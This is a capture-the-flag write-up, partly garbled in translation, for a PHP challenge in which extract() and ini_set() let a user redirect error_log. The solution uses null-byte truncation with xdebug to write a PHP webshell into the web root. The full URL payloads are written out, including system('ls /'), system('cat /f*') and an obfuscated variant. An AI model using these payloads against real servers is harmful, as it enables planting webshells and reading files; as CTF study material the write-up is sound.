Red Envelope Challenge 7
The source code is as follows
<?php
highlight_file(__FILE__);
error_reporting(2);
extract($_GET);
ini_set($name,$value);
system(
"ls '".filter($_GET[1])."'"
);
function filter($cmd){
$cmd = str_replace("'","",$cmd);
$cmd = str_replace("\\","",$cmd);
$cmd = str_replace("`","",$cmd);
$cmd = str_replace("$","",$cmd);
return $cmd;
}
error_reporting(2);
- This sets the error reporting level to only show warnings. This may be to hide potential error messages from the user.extract($_GET);
- This line$_GET
extracts the variables from the array and creates them with the names specified in the array keys. This can lead to potential variable injection vulnerabilities if not sanitized properly.ini_set($name,$value);
- This line attempts$_GET
to set a PHP configuration option using a value from an array.$name
The values for and$value
come from user input, which could lead to potential security vulnerabilities.system("ls '".filter($_GET[1])."'");
- This line attempts to execute a command on a file or directoryls
. Commands are$_GET
built using user input in an array.filter
Function used to sanitize user input by removing certain characters such as single quotes, backslashes, accents, and dollar signs. However, this type of sanitization is not very reliable and the possibility of command injection vulnerabilities may still exist.filter
The function is used to filter the incoming values to see if there are any dangerous characters.
There is also a extract()
function here
Definition and usage
The extract() function imports variables from an array into the current symbol table.
This function uses the array key name as the variable name and the array key value as the variable value. For each element in the array, a corresponding variable will be created in the current symbol table.
The second parameter type is used to specify how the extract() function treats such conflicts when a variable already exists and there is an element with the same name in the array.
This function returns the number of variables successfully imported into the symbol table.
To put it simply, it can accept our variables $name
and $value
process them
expected solution
You can traverse the directory through the ls command. After searching, you can find the extension directory of the topic php
payload:
http://2fa2962f-a892-42c6-abd2-0a186ea1ab21.challenge.ctf.show/?1=/usr/local/lib/php/extensions/no-debug-non-zts-20180731
As you can see, there are 5 extensions in the current environment, including xdebug
When xdebug handles truncation problems, it will payload
echo the exception. And system can just be used 0字节
to 截断
trigger exceptions, that is%00截断
The idea is to write the echoed content (controllable) to the web directory after triggering the exception. You can write a horse.
Before that, let’s introduce ini_set()
the function
PHP ini_set() function
PHP ini_set is used to set the value of php.ini, which takes effect when the function is executed. It is very convenient for virtual space. Here is an introduction to the use of this method.
PHP ini_set is used to set the value of php.ini, which takes effect when the function is executed. After the script ends, the setting becomes invalid. You can modify the configuration without opening the php.ini file, which is very convenient for virtual spaces.
Function format: string ini_set(string $varname, string $newvalue)
In this question, we can use ini_set
functions to temporarily modify php.ini
the PHP configuration in
How to use and configure PHP error_log logging
- error_reporting = E_ALL ; Every error that occurs will be reported to PHP
- display_errors = Off ;Do not display all error reports that meet the rules defined in the previous command
- log_errors = On; Determine the location of log statement recording
- log_errors_max_len = 1024; Set the maximum length of each log entry
- error_log = "The path where you want to store the log file/php_error.log"; Specify the location of the log file where the generated error report is written.
Since we can pass in the values of $name
and $value
, it means that we can control the PHP configuration file error_log
and 错误日志
its writing file. In addition, xdebug mentioned above will echo the exception payload when dealing with truncation problems. So we can use this to write horses
payload:
?name=error_log&value=/var/www/html/shell.php&1=%00<?php system("ls /");?>
Then visitshell.php
You can see the executed ls /
command, change the command to cat /f*
, and then access to get the flag
?name=error_log&value=/var/www/html/flag.php&1=%00<?php system("cat /f*");?>
It is recommended not to have ls
the same file name as the file name used to execute the command.
Get flag after access
Other solutions from masters
payload:
/?name=error_log&value=1.php
&1=("%0C%08%00%00"^"`{ %2f");%255C%2527%2527 )?><?php system("cat /*");?>\‘’//\%23